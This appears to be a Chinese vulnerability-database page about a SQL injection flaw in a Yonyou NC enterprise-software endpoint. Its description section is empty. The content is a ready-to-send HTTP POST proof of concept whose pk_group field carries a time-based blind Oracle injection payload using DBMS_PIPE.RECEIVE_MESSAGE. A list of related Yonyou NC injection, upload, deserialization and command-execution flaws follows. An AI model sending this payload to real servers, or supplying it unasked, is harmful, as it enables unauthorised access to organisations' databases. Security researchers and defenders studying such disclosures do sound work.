用友NC qrySubPurchaseOrgByParentPk SQL注入漏洞

漏洞描述

PoC代码

POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

pk_group=1'+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE('any',5)--

相关漏洞推荐

• 用友NC /portal/pt/oacoSchedulerEvents/uncancelEvent SQL 注入漏洞
• 用友NC /ebvp/register/qrySubPurchaseOrgByParentPk SQL 注入漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• 用友NC /portal/pt/infopathimport/importExcelTemplate pageId 文件上传漏洞
• 用友NC OAUserQryServlet 反序列化漏洞
• 用友NC OAUserAuthenticationServlet 反序列化漏洞
• 用友NC ContactsQueryServiceServlet 反序列化漏洞
• POC 用友NC UserSynchronizationServlet 反序列化漏洞
• 用友NC ContactsFuzzySearchServlet 反序列化漏洞
• POC 用友NC IMsgCenterWebService 命令执行漏洞
• POC 用友nc soapRequest.ajax 命令执行漏洞
• 用友NC存在 PaWfm2/open SQL注入漏洞
• 用友NC系统workflowService接口SQL注入漏洞